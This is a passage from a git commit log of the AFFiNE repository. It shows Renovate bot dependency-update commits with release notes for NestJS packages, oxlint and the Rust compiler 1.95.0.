♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-24 19:28:25 +08:00
renovate[bot] 95dd8d03be chore: bump up nestjs (#15023)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/apollo](https://redirect.github.com/nestjs/graphql) |
[`13.4.1` →
`13.4.2`](https://renovatebot.com/diffs/npm/@nestjs%2fapollo/13.4.1/13.4.2)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fapollo/13.4.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fapollo/13.4.1/13.4.2?slim=true)
|
| [@nestjs/common](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common))
| [`11.1.21` →
`11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.21/11.1.23)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.23?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.21/11.1.23?slim=true)
|
| [@nestjs/core](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core))
| [`11.1.21` →
`11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.21/11.1.23)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.23?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.21/11.1.23?slim=true)
|
| [@nestjs/graphql](https://redirect.github.com/nestjs/graphql) |
[`13.4.1` →
`13.4.2`](https://renovatebot.com/diffs/npm/@nestjs%2fgraphql/13.4.1/13.4.2)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fgraphql/13.4.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fgraphql/13.4.1/13.4.2?slim=true)
|
| [@nestjs/platform-express](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express))
| [`11.1.21` →
`11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.21/11.1.23)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.23?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.21/11.1.23?slim=true)
|
| [@nestjs/platform-socket.io](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io))
| [`11.1.21` →
`11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.21/11.1.23)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.23?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.21/11.1.23?slim=true)
|
| [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) |
[`11.4.3` →
`11.4.4`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.4.3/11.4.4)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fswagger/11.4.4?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fswagger/11.4.3/11.4.4?slim=true)
|
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets))
| [`11.1.21` →
`11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.21/11.1.23)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.23?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.21/11.1.23?slim=true)
|

---

### Release Notes

<details>
<summary>nestjs/graphql (@&#8203;nestjs/apollo)</summary>

###
[`v13.4.2`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.4.2)

[Compare
Source](https://redirect.github.com/nestjs/graphql/compare/v13.4.1...v13.4.2)

##### v13.4.2 (2026-05-21)

##### Bug fixes

- `graphql`
- [#&#8203;4007](https://redirect.github.com/nestjs/graphql/pull/4007)
fix(graphql): preserve PickType fields for dual-decorated inputs
([@&#8203;yudin-s](https://redirect.github.com/yudin-s))

##### Committers: 1

- Serge Yudin ([@&#8203;yudin-s](https://redirect.github.com/yudin-s))

</details>

<details>
<summary>nestjs/nest (@&#8203;nestjs/common)</summary>

###
[`v11.1.23`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.23)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.22...v11.1.23)

##### v11.1.23 (2026-05-21)

##### Bug fixes

- `core`
- [#&#8203;16998](https://redirect.github.com/nestjs/nest/issues/16998)
fix snapshot: true eagerly instantiates Terminus transient indicators
since 11.1.20

##### Committers: 1

- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

###
[`v11.1.22`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.22)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.21...v11.1.22)

##### v11.1.22 (2026-05-21)

##### Bug fixes

- `core`
- [#&#8203;16993](https://redirect.github.com/nestjs/nest/pull/16993)
fix(core): inflight request injection bug
[#&#8203;16989](https://redirect.github.com/nestjs/nest/issues/16989)
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Enhancements

- `core`
- [#&#8203;16967](https://redirect.github.com/nestjs/nest/pull/16967)
fix(core): identify decorator type in invalid-class-module error
([@&#8203;HarrierOnChain](https://redirect.github.com/HarrierOnChain))
  -

##### Committers: 2

- Harrier
([@&#8203;HarrierOnChain](https://redirect.github.com/HarrierOnChain))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/swagger (@&#8203;nestjs/swagger)</summary>

###
[`v11.4.4`](https://redirect.github.com/nestjs/swagger/releases/tag/11.4.4)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.3...11.4.4)

#### 11.4.4 (2026-05-21)

##### Bug fixes

- [#&#8203;3930](https://redirect.github.com/nestjs/swagger/pull/3930)
fix: top-level nullable with discriminator issue
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

##### Enhancements

- [#&#8203;3921](https://redirect.github.com/nestjs/swagger/pull/3921)
feat(swagger): add summary field to Tag Object (OpenAPI 3.2)
([@&#8203;frbuceta](https://redirect.github.com/frbuceta))
- [#&#8203;3924](https://redirect.github.com/nestjs/swagger/pull/3924)
feat(swagger): warn when
[@&#8203;ApiTags](https://redirect.github.com/ApiTags) receives
hierarchy fields
([@&#8203;frbuceta](https://redirect.github.com/frbuceta))
- [#&#8203;3925](https://redirect.github.com/nestjs/swagger/pull/3925)
fix(swagger): type Tag Object kind as a free-form string
([@&#8203;frbuceta](https://redirect.github.com/frbuceta))

##### Committers: 4

- Alexander Scholz
([@&#8203;LucidityDesign](https://redirect.github.com/LucidityDesign))
- Francisco Buceta
([@&#8203;frbuceta](https://redirect.github.com/frbuceta))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- Natanael dos Santos Feitosa
([@&#8203;natanfeitosa](https://redirect.github.com/natanfeitosa))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-24 19:28:10 +08:00
DarkSky 6d1172ba44 chore: bump deps 2026-05-24 07:13:16 +08:00
DarkSky 2aa56cbccd chore: bump toolchain & fix lint 2026-05-24 06:47:17 +08:00
renovate[bot] adfa51a372 chore: bump up oxlint version to v1.66.0 (#14974)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [oxlint](https://oxc.rs/docs/guide/usage/linter)
([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint))
| [`1.58.0` →
`1.66.0`](https://renovatebot.com/diffs/npm/oxlint/1.58.0/1.66.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/oxlint/1.66.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/oxlint/1.58.0/1.66.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/oxc (oxlint)</summary>

###
[`v1.66.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1660---2026-05-18)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.65.0...oxlint_v1.66.0)

##### 🚀 Features

-
[`0440b0f`](https://redirect.github.com/oxc-project/oxc/commit/0440b0f)
linter/eslint: Implement `id-match` rule
([#&#8203;22379](https://redirect.github.com/oxc-project/oxc/issues/22379))
(Vladislav Sayapin)
-
[`65bf119`](https://redirect.github.com/oxc-project/oxc/commit/65bf119)
linter: Implement react no-object-type-as-default-prop
([#&#8203;22481](https://redirect.github.com/oxc-project/oxc/issues/22481))
(uhyo)
-
[`2a6ddce`](https://redirect.github.com/oxc-project/oxc/commit/2a6ddce)
linter/eslint: Implement `no-implied-eval` rule
([#&#8203;22391](https://redirect.github.com/oxc-project/oxc/issues/22391))
(Vladislav Sayapin)
-
[`625758a`](https://redirect.github.com/oxc-project/oxc/commit/625758a)
linter/vitest: Implement padding-around-after-all-blocks rule
([#&#8203;21788](https://redirect.github.com/oxc-project/oxc/issues/21788))
(kapobajza)
-
[`37680b0`](https://redirect.github.com/oxc-project/oxc/commit/37680b0)
linter: Implement react no-unstable-nested-components
([#&#8203;22248](https://redirect.github.com/oxc-project/oxc/issues/22248))
(Jovi De Croock)
-
[`d8d9c74`](https://redirect.github.com/oxc-project/oxc/commit/d8d9c74)
linter: Implement import/newline-after-import rule
([#&#8203;19142](https://redirect.github.com/oxc-project/oxc/issues/19142))
(Ryuya Yanagi)

###
[`v1.65.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1650---2026-05-15)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.64.0...oxlint_v1.65.0)

##### 🚀 Features

-
[`5478fb5`](https://redirect.github.com/oxc-project/oxc/commit/5478fb5)
linter/jsdoc: Implement `require-throws-description` rule
([#&#8203;22386](https://redirect.github.com/oxc-project/oxc/issues/22386))
(Mikhail Baev)
-
[`c73225e`](https://redirect.github.com/oxc-project/oxc/commit/c73225e)
linter/eslint: Implement `prefer-arrow-callback` rule
([#&#8203;22312](https://redirect.github.com/oxc-project/oxc/issues/22312))
(박천(Cheon Park))
-
[`de82b59`](https://redirect.github.com/oxc-project/oxc/commit/de82b59)
linter: Add support for `eslint-plugin-jsx-a11y-x`
([#&#8203;22356](https://redirect.github.com/oxc-project/oxc/issues/22356))
(mehm8128)
-
[`f44b6c8`](https://redirect.github.com/oxc-project/oxc/commit/f44b6c8)
linter: Fill schemas `DummyRuleMap` with built-in rules
([#&#8203;22288](https://redirect.github.com/oxc-project/oxc/issues/22288))
(Sysix)

###
[`v1.64.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1640---2026-05-11)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.63.0...oxlint_v1.64.0)

##### 🚀 Features

-
[`fbb8f22`](https://redirect.github.com/oxc-project/oxc/commit/fbb8f22)
linter: Support `ignores` in overrides
([#&#8203;22148](https://redirect.github.com/oxc-project/oxc/issues/22148))
(camc314)

##### 🐛 Bug Fixes

-
[`25b7017`](https://redirect.github.com/oxc-project/oxc/commit/25b7017)
linter: Undocument override `ignores` option
([#&#8203;22213](https://redirect.github.com/oxc-project/oxc/issues/22213))
(camc314)

###
[`v1.63.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1630---2026-05-05)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.62.0...oxlint_v1.63.0)

##### 📚 Documentation

-
[`cacbc4a`](https://redirect.github.com/oxc-project/oxc/commit/cacbc4a)
linter: Fix jest settings docs.
([#&#8203;22127](https://redirect.github.com/oxc-project/oxc/issues/22127))
(connorshea)

###
[`v1.62.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1620---2026-04-27)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/7a75f0d0555ee8e5012874eeb3f06f7272804e37...oxlint_v1.62.0)

##### 🚀 Features

-
[`348f46c`](https://redirect.github.com/oxc-project/oxc/commit/348f46c)
linter: Add `respectEslintDisableDirectives` option
([#&#8203;21384](https://redirect.github.com/oxc-project/oxc/issues/21384))
(Christian Vuerings)

##### 🐛 Bug Fixes

-
[`8c425db`](https://redirect.github.com/oxc-project/oxc/commit/8c425db)
linter: Allow string for jest version in config schema
([#&#8203;21649](https://redirect.github.com/oxc-project/oxc/issues/21649))
(camc314)

###
[`v1.61.1`](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.61.0...7a75f0d0555ee8e5012874eeb3f06f7272804e37)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.61.0...7a75f0d0555ee8e5012874eeb3f06f7272804e37)

###
[`v1.61.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1610---2026-04-20)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.60.0...oxlint_v1.61.0)

##### 🚀 Features

-
[`38d8090`](https://redirect.github.com/oxc-project/oxc/commit/38d8090)
linter/jest: Implemented jest `version` settings in config file.
([#&#8203;21522](https://redirect.github.com/oxc-project/oxc/issues/21522))
(Said Atrahouch)

###
[`v1.60.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1600---2026-04-13)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.59.0...oxlint_v1.60.0)

##### 📚 Documentation

-
[`cfd8a4f`](https://redirect.github.com/oxc-project/oxc/commit/cfd8a4f)
linter: Don't rely on old eslint doc for available globals
([#&#8203;21334](https://redirect.github.com/oxc-project/oxc/issues/21334))
(Nicolas Le Cam)

### [`v1.59.0`]()

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.58.0...oxlint_v1.59.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzkuMyIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-24 06:30:01 +08:00
renovate[bot] 4f0d9aff30 chore: bump up rustc version to v1.95.0 (#15009)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [rustc](https://redirect.github.com/rust-lang/rust) | minor | `1.94.0`
→ `1.95.0` |

---

### Release Notes

<details>
<summary>rust-lang/rust (rustc)</summary>

###
[`v1.95.0`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1950-2026-04-16)

[Compare
Source](https://redirect.github.com/rust-lang/rust/compare/1.94.1...1.95.0)

\===========================

<a id="1.95-Language"></a>

## Language

- [Stabilize `if let` guards on match
arms](https://redirect.github.com/rust-lang/rust/pull/141295)
- [`irrefutable_let_patterns` lint no longer lints on let
chains](https://redirect.github.com/rust-lang/rust/pull/146832)
- [Support importing path-segment keywords with
renaming](https://redirect.github.com/rust-lang/rust/pull/146972)
- [Stabilize inline assembly for PowerPC and
PowerPC64](https://redirect.github.com/rust-lang/rust/pull/147996)
- [const-eval: be more consistent in the behavior of padding during
typed copies](https://redirect.github.com/rust-lang/rust/pull/148967)
- [Const blocks are no longer evaluated to determine if expressions
involving fallible operations can implicitly be
constant-promoted.](https://redirect.github.com/rust-lang/rust/pull/150557).
Expressions whose ability to implicitly be promoted would depend on the
result of a const block are no longer implicitly promoted.
- [Make operational semantics of pattern matching independent of crate
and module](https://redirect.github.com/rust-lang/rust/pull/150681)

<a id="1.95-Compiler"></a>

## Compiler

- [Stabilize `--remap-path-scope` for controlling the scoping of how
paths get remapped in the resulting
binary](https://redirect.github.com/rust-lang/rust/pull/147611)
- [Apply patches for CVE-2026-6042 and CVE-2026-40200 to vendored
musl](https://redirect.github.com/rust-lang/rust/pull/155171)

<a id="1.95-Platform-Support"></a>

## Platform Support

- [Promote `powerpc64-unknown-linux-musl` to Tier 2 with host
tools](https://redirect.github.com/rust-lang/rust/pull/149962)
- [Promote `aarch64-apple-tvos` to Tier
2](https://redirect.github.com/rust-lang/rust/pull/152021)
- [Promote `aarch64-apple-tvos-sim` to Tier
2](https://redirect.github.com/rust-lang/rust/pull/152021)
- [Promote `aarch64-apple-watchos` to Tier
2](https://redirect.github.com/rust-lang/rust/pull/152021)
- [Promote `aarch64-apple-watchos-sim` to Tier
2](https://redirect.github.com/rust-lang/rust/pull/152021)
- [Promote `aarch64-apple-visionos` to Tier
2](https://redirect.github.com/rust-lang/rust/pull/152021)
- [Promote `aarch64-apple-visionos-sim` to Tier
2](https://redirect.github.com/rust-lang/rust/pull/152021)

Refer to Rust's [platform support page][platform-support-doc]
for more information on Rust's tiered platform support.

[platform-support-doc]:
https://doc.rust-lang.org/rustc/platform-support.html

<a id="1.95-Libraries"></a>

## Libraries

- [`thread::scope`: document how join interacts with TLS
destructors](https://redirect.github.com/rust-lang/rust/pull/149482)
- [Speed up `str::contains` on aarch64 targets with `neon` target
feature enabled by
default](https://redirect.github.com/rust-lang/rust/pull/152176)

<a id="1.95-Stabilized-APIs"></a>

## Stabilized APIs

- [`MaybeUninit<[T; N]>: From<[MaybeUninit<T>;
N]>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-From%3CMaybeUninit%3C%5BT;+N%5D%3E%3E-for-%5BMaybeUninit%3CT%3E;+N%5D)
- [`MaybeUninit<[T; N]>: AsRef<[MaybeUninit<T>;
N]>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-AsRef%3C%5BMaybeUninit%3CT%3E;+N%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E)
- [`MaybeUninit<[T; N]>:
AsRef<[MaybeUninit<T>]>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-AsRef%3C%5BMaybeUninit%3CT%3E%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E)
- [`MaybeUninit<[T; N]>: AsMut<[MaybeUninit<T>;
N]>`](https://doc.rust-lang.org/beta/std/mem/union.MaybeUninit.html#impl-AsMut%3C%5BMaybeUninit%3CT%3E;+N%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E)
- [`MaybeUninit<[T; N]>:
AsMut<[MaybeUninit<T>]>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-AsMut%3C%5BMaybeUninit%3CT%3E%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E)
- [`[MaybeUninit<T>; N]: From<MaybeUninit<[T;
N]>>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-From%3C%5BMaybeUninit%3CT%3E;+N%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E)
- [`Cell<[T; N]>: AsRef<[Cell<T>;
N]>`](https://doc.rust-lang.org/stable/std/cell/struct.Cell.html#impl-AsRef%3C%5BCell%3CT%3E;+N%5D%3E-for-Cell%3C%5BT;+N%5D%3E)
- [`Cell<[T; N]>:
AsRef<[Cell<T>]>`](https://doc.rust-lang.org/stable/std/cell/struct.Cell.html#impl-AsRef%3C%5BCell%3CT%3E%5D%3E-for-Cell%3C%5BT;+N%5D%3E)
- [`Cell<[T]>:
AsRef<[Cell<T>]>`](https://doc.rust-lang.org/stable/std/cell/struct.Cell.html#impl-AsRef%3C%5BCell%3CT%3E%5D%3E-for-Cell%3C%5BT%5D%3E)
- [`bool:
TryFrom<{integer}>`](https://doc.rust-lang.org/stable/std/primitive.bool.html#impl-TryFrom%3Cu128%3E-for-bool)
-
[`AtomicPtr::update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicPtr.html#method.update)
-
[`AtomicPtr::try_update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicPtr.html#method.try_update)
-
[`AtomicBool::update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicBool.html#method.update)
-
[`AtomicBool::try_update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicBool.html#method.try_update)
-
[`AtomicIn::update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicIsize.html#method.update)
-
[`AtomicIn::try_update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicIsize.html#method.try_update)
-
[`AtomicUn::update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicUsize.html#method.update)
-
[`AtomicUn::try_update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicUsize.html#method.try_update)
-
[`cfg_select!`](https://doc.rust-lang.org/stable/std/macro.cfg_select.html)
- [`mod
core::range`](https://doc.rust-lang.org/stable/core/range/index.html)
-
[`core::range::RangeInclusive`](https://doc.rust-lang.org/stable/core/range/struct.RangeInclusive.html)
-
[`core::range::RangeInclusiveIter`](https://doc.rust-lang.org/stable/core/range/struct.RangeInclusiveIter.html)
-
[`core::hint::cold_path`](https://doc.rust-lang.org/stable/core/hint/fn.cold_path.html)
- [`<*const
T>::as_ref_unchecked`](https://doc.rust-lang.org/stable/std/primitive.pointer.html#method.as_ref_unchecked)
- [`<*mut
T>::as_ref_unchecked`](https://doc.rust-lang.org/stable/std/primitive.pointer.html#method.as_ref_unchecked-1)
- [`<*mut
T>::as_mut_unchecked`](https://doc.rust-lang.org/stable/std/primitive.pointer.html#method.as_mut_unchecked)
-
[`Vec::push_mut`](https://doc.rust-lang.org/stable/std/vec/struct.Vec.html#method.push_mut)
-
[`Vec::insert_mut`](https://doc.rust-lang.org/stable/std/vec/struct.Vec.html#method.insert_mut)
-
[`VecDeque::push_front_mut`](https://doc.rust-lang.org/stable/std/collections/struct.VecDeque.html#method.push_front_mut)
-
[`VecDeque::push_back_mut`](https://doc.rust-lang.org/stable/std/collections/struct.VecDeque.html#method.push_back_mut)
-
[`VecDeque::insert_mut`](https://doc.rust-lang.org/stable/std/collections/struct.VecDeque.html#method.insert_mut)
-
[`LinkedList::push_front_mut`](https://doc.rust-lang.org/stable/std/collections/struct.LinkedList.html#method.push_front_mut)
-
[`LinkedList::push_back_mut`](https://doc.rust-lang.org/stable/std/collections/struct.LinkedList.html#method.push_back_mut)
-
[`Layout::dangling_ptr`](https://doc.rust-lang.org/stable/std/alloc/struct.Layout.html#method.dangling_ptr)
-
[`Layout::repeat`](https://doc.rust-lang.org/stable/std/alloc/struct.Layout.html#method.repeat)
-
[`Layout::repeat_packed`](https://doc.rust-lang.org/stable/std/alloc/struct.Layout.html#method.repeat_packed)
-
[`Layout::extend_packed`](https://doc.rust-lang.org/stable/std/alloc/struct.Layout.html#method.extend_packed)

These previously stable APIs are now stable in const contexts:

-
[`fmt::from_fn`](https://doc.rust-lang.org/stable/std/fmt/fn.from_fn.html)
-
[`ControlFlow::is_break`](https://doc.rust-lang.org/stable/core/ops/enum.ControlFlow.html#method.is_break)
-
[`ControlFlow::is_continue`](https://doc.rust-lang.org/stable/core/ops/enum.ControlFlow.html#method.is_continue)

<a id="1.95-Rustdoc"></a>

## Rustdoc

- [In search results, rank unstable items
lower](https://redirect.github.com/rust-lang/rust/pull/149460)
- [Add new "hide deprecated items" setting in
rustdoc](https://redirect.github.com/rust-lang/rust/pull/151091)

<a id="1.95-Compatibility-Notes"></a>

## Compatibility Notes

- [Array coercions may now result in less inference constraints than
before](https://redirect.github.com/rust-lang/rust/pull/140283)
- Importing `$crate` without renaming, i.e. `use $crate::{self};`, is
now no longer permitted due to stricter error checking for `self`
imports.
- [const-eval: be more consistent in the behavior of padding during
typed copies.](https://redirect.github.com/rust-lang/rust/pull/148967)
In very rare cases, this may cause compilation errors due to bytes from
parts of a pointer ending up in the padding bytes of a `const` or
`static`.
- [A future-incompatibility warning lint
`ambiguous_glob_imported_traits` is now reported when using an
ambiguously glob imported
trait](https://redirect.github.com/rust-lang/rust/pull/149058)
- [Check lifetime bounds of types mentioning only type
parameters](https://redirect.github.com/rust-lang/rust/pull/149389)
- [Report more visibility-related ambiguous import
errors](https://redirect.github.com/rust-lang/rust/pull/149596)
- [Deprecate `Eq::assert_receiver_is_total_eq` and emit future
compatibility warnings on manual
impls](https://redirect.github.com/rust-lang/rust/pull/149978)
- [powerpc64: Use the ELF ABI version set in target spec instead of
guessing](https://redirect.github.com/rust-lang/rust/pull/150468) (fixes
the ELF ABI used by the OpenBSD target)
- Matching on a `#[non_exhaustive]` enum [now reads the discriminant,
even if the enum has only one
variant](https://redirect.github.com/rust-lang/rust/pull/150681). This
can cause closures to capture values that they previously wouldn't.
- `mut ref` and `mut ref mut` patterns, part of the unstable [Match
Ergonomics 2024
RFC](https://redirect.github.com/rust-lang/rust/issues/123076), were
accidentally allowed on stable within struct pattern field shorthand.
These patterns are now correctly feature-gated as unstable in this
position.
- [Add future-compatibility warning for derive helper attributes which
conflict with built-in
attributes](https://redirect.github.com/rust-lang/rust/pull/151152)
- [JSON target
specs](https://doc.rust-lang.org/rustc/targets/custom.html) have been
destabilized and now require `-Z unstable-options` to use. Previously,
they could not be used without the standard library, which has no stable
build mechanism. In preparation for the `build-std` project adding that
support, JSON target specs are being proactively gated to ensure they
remain unstable even if `build-std` is stabilized. Cargo now includes
the `-Z json-target-spec` CLI flag to automatically pass `-Z
unstable-options` to the compiler when needed. See
[#&#8203;150151](https://redirect.github.com/rust-lang/rust/pull/150151),
[#&#8203;151534](https://redirect.github.com/rust-lang/rust/pull/150151),
and
[rust-lang/cargo#16557](https://redirect.github.com/rust-lang/cargo/pull/16557).
- [The arguments of `#[feature]` attributes on invalid targets are now
checked](https://redirect.github.com/rust-lang/rust/issues/153764)

<a id="1.95-Internal-Changes"></a>

## Internal Changes

These changes do not affect any public interfaces of Rust, but they
represent
significant improvements to the performance or internals of rustc and
related
tools.

- [Update to LLVM
22](https://redirect.github.com/rust-lang/rust/pull/150722)

###
[`v1.94.1`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1941-2026-03-26)

[Compare
Source](https://redirect.github.com/rust-lang/rust/compare/1.94.0...1.94.1)

\===========================

<a id="1.94.1"></a>

- [Fix `std::thread::spawn` on
wasm32-wasip1-threads](https://redirect.github.com/rust-lang/rust/pull/153634)
- [Remove new methods added to
`std::os::windows::fs::OpenOptionsExt`](https://redirect.github.com/rust-lang/rust/pull/153491)
The new methods were unstable, but the trait itself is not sealed and so
  cannot be extended with non-default methods.
- [Clippy: fix ICE in
`match_same_arms`](https://redirect.github.com/rust-lang/rust-clippy/pull/16685)
- [Cargo: update tar to
0.4.45](https://redirect.github.com/rust-lang/cargo/pull/16769)
This resolves CVE-2026-33055 and CVE-2026-33056. Users of crates.io are
not affected.
See [blog](https://blog.rust-lang.org/2026/03/21/cve-2026-33056/) for
more details.

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
